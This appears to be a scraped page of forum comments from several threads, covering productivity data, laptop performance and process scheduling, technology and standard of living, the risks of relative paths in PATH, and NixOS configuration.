I read an article in FT just a couple days ago claiming that increased productivity was becoming visible in economic data
> My own updated analysis suggests a US productivity increase of roughly 2.7 per cent for 2025. This is a near doubling from the sluggish 1.4 per cent annual average that characterised the past decade.
I think you're bringing up a great question here. If you ask a random person on the street "is your laptop fast", the answer probably has more to do with what software that person is running, than what hardware.
My Apple silicon laptop feels super fast because I just open the lid and it's running. That's not because the CPU ran instructions super fast, it's because I can just close the lid and the battery lasts forever.
My guess would be that ARM Chromebooks might run substantially more cut-down firmware? While intel might need a more full-fat EFI stack? But I haven't used either and am just speculating.
I think in the example the OP is making, the work is not useless. They're saying if you had a system doing the same work, with maybe 60 processes, you're better off splitting that into 600 processes and a couple thousand threads, since that will allow granular classification of tasks by their latency sensitivity
But it is, he's talking about real systems with real processes in a generic way, not a singular hypothetical where suddenly all that work must be done, so you can also apply you general knowledge that some of those background processes aren't useful (but can't even be disabled due to system lockdown)
I think you're right that the article didn't provide criteria for when this type of system is better or worse than another. For example, the cost of splitting a work into threads and switching between threads needs to be factored in. If that cost is very high, then the multi-thread system could very well be worse. And there are other factors too.
However, given the trend in modern software engineering to break work into units and the fact that on modern hardware thread switches happen very quickly, being able to distribute that work across different compute clusters that make different optimization choices is a good thing and allows schedulers to get results closer to optimal.
So really it boils down to if the gains in doing the work on different compute outweighs the cost splitting and distributing the work, then it's a win. And for most modern software on most modern hardware, the win is very significant.
> (...) a singular hypothetical where suddenly all that work must be done (...)
This is far from being a hypothesis. This is an accurate description of your average workstation. I recommend you casually check the list of processes running at any given moment in any random desktop or laptop you find in a 5 meter radius.
I've done more than that - after noticing high CPU use I investigated what those processes do, discovered services that I never need and tried to disable them. Now try to actually prove your point
It's true, they don't "make 'em like they used to". They make them in new, more efficient ways which have contributed to improving global trends in metrics such as literacy, child mortality, life expectancy, extreme poverty, and food supply.
If you are arguing that standard of living today is lower than in the past, I think that is a very steep uphill battle to argue
If your worries are about ecology and sustainability I agree that is a concern we need to address more effectively than we have in the past. Technology will almost certainly be part of that solution via things like fusion energy. Success is not assured and we cannot just sit back and say "we live in the best of all possible worlds with a glorious manifest destiny", but I don't think that the future is particularly bleak compared to the past
I worry that humanity has a track record of diving head first into new technologies without worrying about externalities like the environment or job displacement.
I wish we were more thoughtful and focused more on minimizing the downsides of new technologies.
Instead it seems we’re headed full steam towards huge amounts of energy use and job displacement. And the main bonus is rich people get richer.
I’m not sure if having software be cheaper is beneficial. Is it good for malware to be easier to produce? I’d personally choose higher quality software over more software.
I’m not convinced cheaper mass produced clothing has been a net positive. Will AI be a positive? Time will tell. In the short term there are some obvious negatives.
> If you are arguing that standard of living today is lower than in the past, I think that is a very steep uphill battle to argue
We'd first have to agree on a definition for "standard of living". There are certainly many (important to me) aspects in which we have regressed and being able to buy cheap tech crap does not make up for it.
One could set an env var to their local bin dir which is otherwise not in the path, like L=/home/ahepp/.local/bin, and then do $L/mycommand. Doesn't meet the OP's requirement of no shift key.
Or prefix files in the local bin dir with a couple letters from your username, like /home/ahepp/.local/bin/ah-mycommand
I think it's substantially riskier. At the very least, it means you are trusting any directory you cd into, rather than just trusting your $home/bin.
Stuff that would not typically raise eyebrows has been made risky. You might cd into less privileged user's $home, or some web service's data directory, and suddenly you've given whoever had access to those users, access to your user.
Maybe you could argue "well, I just won't cd outside of my $home", but the sheer unexpectedness of the behavior seems deeply undesirable to me.
NixOS simultaneously smooths the path to using absolute paths while putting some (admittedly minor) speed-bumps in the way when avoiding them. If you package something up that uses relative paths it will probably break for someone else relatively quickly.
What that means is that you end up with a system in which absolute paths are used almost everywhere.
This is why the killer feature of NixOS isn't that you can configure things from a central place; RedHat had a tool to do that at least 25 years ago; it's that since most of /etc/ is read-only, you must configure everything from a central place, which has two important effects:
1. The tool for configuring things in a central place can be much simplified since it doesn't have to worry about people changing things out from under it
2. Any time someone runs into something that is painful with the tool for configuring things in a central place, they have to improve the tool (or abandon NixOS).
I don't believe that's consistent with the data
https://fred.stlouisfed.org/series/MEHOINUSA672N
reply